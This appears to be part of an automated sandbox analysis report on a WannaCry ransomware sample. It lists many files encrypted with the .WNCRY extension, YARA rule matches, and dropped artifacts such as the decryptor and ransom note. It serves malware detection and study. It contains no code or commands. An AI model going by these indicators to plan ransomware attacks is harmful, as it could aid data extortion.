Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700559076731.txt.WNCRYT entropy: 7.99817706524	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700655677854.txt.WNCRYT entropy: 7.99841098615	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSScan\WelcomeScan.jpg.WNCRY (copy) entropy: 7.99961931077	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\acrobat_sbx\acroNGLLog.txt.WNCRY (copy) entropy: 7.9927548529	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Edge\User Data\EADPData Component\4.0.2.33\data.txt.WNCRY (copy) entropy: 7.99748474994	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRY (copy) entropy: 7.99972982378	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.MicrosoftOfficeHub_8wekyb3d8bbwe\AC\INetCache\HXWKPVWZ\hero-image-desktop-f6720a4145[1].jpg.WNCRY (copy) entropy: 7.99818369826	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409699892906782.txt.WNCRY (copy) entropy: 7.99832452335	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409699906926699.txt.WNCRY (copy) entropy: 7.99814209376	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700426789434.txt.WNCRY (copy) entropy: 7.99837744758	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700490540470.txt.WNCRY (copy) entropy: 7.99807327065	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700559076731.txt.WNCRY (copy) entropy: 7.99817706524	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700655677854.txt.WNCRY (copy) entropy: 7.99841098615	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409700847494859.txt.WNCRY (copy) entropy: 7.99835379204	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409701041821502.txt.WNCRY (copy) entropy: 7.99821821966	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409701427142301.txt.WNCRY (copy) entropy: 7.99805119676	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409703539336388.txt.WNCRY (copy) entropy: 7.99840439814	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409704901523875.txt.WNCRY (copy) entropy: 7.99844723469	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409705198455190.txt.WNCRY (copy) entropy: 7.998600263	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409705498789017.txt.WNCRY (copy) entropy: 7.99850147178	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409706362564741.txt.WNCRY (copy) entropy: 7.9983748959	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409706552534938.txt.WNCRY (copy) entropy: 7.99833760614	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409706620146268.txt.WNCRY (copy) entropy: 7.99841076986	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409706852088195.txt.WNCRY (copy) entropy: 7.99846585935	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409708018850913.txt.WNCRY (copy) entropy: 7.99847568897	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409708318751933.txt.WNCRY (copy) entropy: 7.99860767752	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133409708745795147.txt.WNCRY (copy) entropy: 7.99843143582	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664184897943762.txt.WNCRY (copy) entropy: 7.9984927715	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664185202193242.txt.WNCRY (copy) entropy: 7.99846531581	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\appsconversions.txt.WNCRY (copy) entropy: 7.9998923764	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\appsglobals.txt.WNCRY (copy) entropy: 7.99941949843	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\appssynonyms.txt.WNCRY (copy) entropy: 7.99929259074	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\settingsglobals.txt.WNCRY (copy) entropy: 7.9961803825	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{1bd4368b-5a81-4340-bb70-c47e715ef59b}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99496134561	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{a88a3c12-5895-49c0-aebb-958acaa71fed}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99483055468	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{d3eb7398-595c-4598-92b2-c8e082ebc5c4}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99492033993	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\settingsconversions.txt.WNCRY (copy) entropy: 7.99962887231	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{19865394-38c8-473b-8d88-bf07dc9221d0}\settingssynonyms.txt.WNCRY (copy) entropy: 7.99846569771	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{69143257-42f5-46b5-8baf-30774e2e792c}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99920940341	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Local\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{d7420b01-ee72-478b-af4f-6b44c9dc7707}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99916175554	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\CachedImage_1280_1024_POS4.jpg.WNCRY (copy) entropy: 7.9973389896	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664185510902646.txt.WNCRY (copy) entropy: 7.99833490946	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\user\Local Settings\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{67e6418b-1ac4-40f2-b8e8-9239c2e7a1ab}\0.0.filtertrie.intermediate.txt.WNCRY (copy) entropy: 7.99448816077	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133664185800176358.txt.WNCRY (copy) entropy: 7.99852420098	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\EventStore.db.WNCRY (copy) entropy: 7.9982191542	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Network\Downloader\qmgr.db.WNCRY (copy) entropy: 7.99985862946	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\guest.bmp.WNCRY (copy) entropy: 7.99968472751	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\User Account Pictures\user.bmp.WNCRY (copy) entropy: 7.99971567493	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Scans\mpenginedb.db.WNCRY (copy) entropy: 7.99959620519	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\ScenariosSqlStore\EventStore.db.WNCRY (copy) entropy: 7.9948575216	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Diagnosis\TenantStorage\P-ARIA\EventStore.db.WNCRY (copy) entropy: 7.99302264369	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\tmp.edb.WNCRY (copy) entropy: 7.99896243712	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Search\Data\Applications\Windows\Windows.edb.WNCRY (copy) entropy: 7.99999027356	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\SmsRouter\MessageStore\SmsInterceptStore.db.WNCRY (copy) entropy: 7.99909898076	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows NT\MSFax\VirtualInbox\en-GB\WelcomeFax.tif.WNCRY (copy) entropy: 7.99788521438	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png.WNCRY (copy) entropy: 7.99668514583	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png.WNCRY (copy) entropy: 7.99378226164	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\ClickToRun\ProductReleases\A2C4612B-C11F-4E4C-8240-7294F3668696\operations.db.WNCRY (copy) entropy: 7.99998437313	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png.WNCRY (copy) entropy: 7.99847065788	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png.WNCRY (copy) entropy: 7.99497218578	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png.WNCRY (copy) entropy: 7.99856064717	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png.WNCRY (copy) entropy: 7.99410816118	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000009.db.WNCRY (copy) entropy: 7.99933304463	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000a.db.WNCRY (copy) entropy: 7.99944602742	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000d.db.WNCRY (copy) entropy: 7.99938184882	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db.WNCRY (copy) entropy: 7.9997040124	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\Windows Defender\Scans\mpcache-E40F86FA01C77D7D9BB0598F680933D3AB85396F.bin.DB.WNCRY (copy) entropy: 7.99989192587	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\ClickToRun\ProductReleases\A2C4612B-C11F-4E4C-8240-7294F3668696\en-us.16\stream.x86.en-us.db.WNCRY (copy) entropy: 7.9995755228	Jump to dropped file
Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe	File created: C:\Documents and Settings\All Users\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Microsoft\ClickToRun\ProductReleases\A2C4612B-C11F-4E4C-8240-7294F3668696\x-none.16\stream.x86.x-none.db.WNCRY (copy) entropy: 7.99989182936	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: LisectAVT_2403002A_126.EXE.exe, type: SAMPLE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects WannaCry Ransomware Author: Florian Roth (with the help of binar.ly)
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: 0.0.LisectAVT_2403002A_126.EXE.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: 00000000.00000000.1324912594.000000000040E000.00000008.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: detects wannacry ransomware on disk and in virtual page Author: us-cert code analysis team
Source: C:\@Please_Read_Me@.txt, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\Users\user\Desktop\70341721944935.bat, type: DROPPED	Matched rule: Detects WannaCry Ransomware BATCH File Author: Florian Roth
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\@WanaDecryptor@.exe, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\u.wnry, type: DROPPED	Matched rule: Win32_Ransomware_WannaCry Author: ReversingLabs
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth
Source: C:\Users\user\Desktop\r.wnry, type: DROPPED	Matched rule: Detects WannaCry Ransomware Note Author: Florian Roth

Source: C:\Users\user\Desktop\LisectAVT_2403002A_126.EXE.exe

Process Stats: CPU usage > 49%

